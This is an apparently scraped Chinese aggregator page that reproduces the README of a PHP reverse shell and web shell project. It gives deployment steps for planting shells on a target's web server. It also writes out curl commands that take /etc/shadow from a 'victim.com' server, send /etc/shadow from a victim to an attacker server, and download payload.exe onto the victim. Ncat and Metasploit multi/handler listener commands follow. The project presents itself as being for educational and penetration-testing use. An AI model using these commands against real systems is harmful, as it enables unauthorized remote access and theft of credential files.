• 设为首页
  • 点击收藏
  • 手机版
    手机扫一扫访问
    迪恩网络手机版
  • 关注官方公众号
    微信扫一扫关注
    公众号

ivan-sincek/php-reverse-shell: PHP shells that work on Linux OS, macOS, and Wind ...

原作者: [db:作者] 来自: 网络 收藏 邀请

开源软件名称(OpenSource Name):

ivan-sincek/php-reverse-shell

开源软件地址(OpenSource Url):

https://github.com/ivan-sincek/php-reverse-shell

开源编程语言(OpenSource Language):

PHP 100.0%

开源软件介绍(OpenSource Introduction):

PHP Reverse Shell

Just a little refresh on the popular PHP reverse shell script pentestmonkey/php-reverse-shell. Credits to the original author!

Works on Linux OS and macOS with /bin/sh and Windows OS with cmd.exe. Script will automatically detect an underlying OS.

Works with both ncat and multi/handler.

Tested on XAMPP for Linux v7.3.19 (64-bit) with PHP v7.3.19 on Kali Linux v2020.2 (64-bit).

Tested on XAMPP for OS X v7.4.10 (64-bit) with PHP v7.4.10 on macOS Catalina v10.15.6 (64-bit).

Tested on XAMPP for Windows v7.4.3 (64-bit) with PHP v7.4.3 on Windows 10 Enterprise OS (64-bit).

In addition, everything was tested on Docker images nouphet/docker-php4 with PHP v4.4.0 and steeze/php52-nginx with PHP v5.2.17.

Made for educational purposes. I hope it will help!

Process pipes on Windows OS do not support asynchronous operations so stream_set_blocking(), stream_select(), and feof() will not work properly, but I found a workaround.

Table of Contents

Reverse Shells

/src/reverse/php_reverse_shell.php requires PHP v5.0.0 or greater, mainly because proc_get_status() is used.

/src/reverse/php_reverse_shell_older.php requires PHP v4.3.0 or greater.

Change the IP address and port number inside the scripts as necessary.

Copy /src/reverse/php_reverse_shell.php to your server's web root directory (e.g. to /opt/lampp/htdocs/ on XAMPP) or upload it to your target's web server.

Navigate to the file with your preferred web browser.

Web Shells

Check the simple PHP web shell based on HTTP POST request.

Check the simple PHP web shell based on HTTP GET request. You must URL encode your commands.

Check the simple PHP web shell v2 based on HTTP GET request. You must URL encode your commands.

Find out more about PHP obfuscation techniques for older versions of PHP at lcatro/PHP-WebShell-Bypass-WAF. Credits to the author!

File Upload/Download Script

Check the simple PHP file upload/download script based on HTTP POST request for file upload and HTTP GET request for file download.

When downloading a file, you should URL encode the file path, and specify name of the output file.

Depending on the server configuration, downloading a file through HTTP GET parameter might not always work, so you will have to hardcore the file path in the script.

Case 1: Upload the Script to the Victim’s Server

Navigate to the script on the victim's server with your preferred web browser, or use cURL from you PC.

Upload a file to the victim's server web root directory from your PC:

curl -s -k -X POST https://victim.com/files.php -F file=@/root/payload.exe

Download a file from the victim's PC to your PC:

curl -s -k -X GET https://victim.com/files.php?file=/etc/shadow -o shadow

If you use reverse shell and you have elevated your initial privileges, this script might not have the same privileges as your shell. To download a certain file, you might need to copy the file to the web root directory and give it necessary read permissions.

Case 2: Upload the Script to Your Server

From your PHP reverse shell, run the following cURL commands.

Upload a file from the victim's PC to your server web root directory:

curl -s -k -X POST https://your-server.com/files.php -F file=@/etc/shadow

Download a file from your PC to the victim's PC:

curl -s -k -X GET https://your-server.com/files.php?file=/root/payload.exe -o payload.exe

curl -s -k -X GET https://your-server.com/payload.exe -o payload.exe

Set Up a Listener

To set up a listener, open your preferred console on Kali Linux and run one of the examples below.

Set up ncat listener:

ncat -nvlp 9000

Set up multi/handler listener:

msfconsole -q

use exploit/multi/handler

set PAYLOAD windows/shell_reverse_tcp

set LHOST 192.168.8.185

set LPORT 9000

exploit

Images

Ncat

Figure 1 - Ncat

Script Dump

Figure 2 - Script's Dump




鲜花

握手

雷人

路过

鸡蛋
该文章已有0人参与评论

请发表评论

全部评论

专题导读
热门推荐
阅读排行榜

扫描微信二维码

查看手机版网站

随时了解更新最新资讯

139-2527-9053

在线客服(服务时间 9:00~18:00)

在线QQ客服
地址:深圳市南山区西丽大学城创智工业园
电邮:jeky_zhao#qq.com
移动电话:139-2527-9053

Powered by 互联科技 X3.4© 2001-2213 极客世界.|Sitemap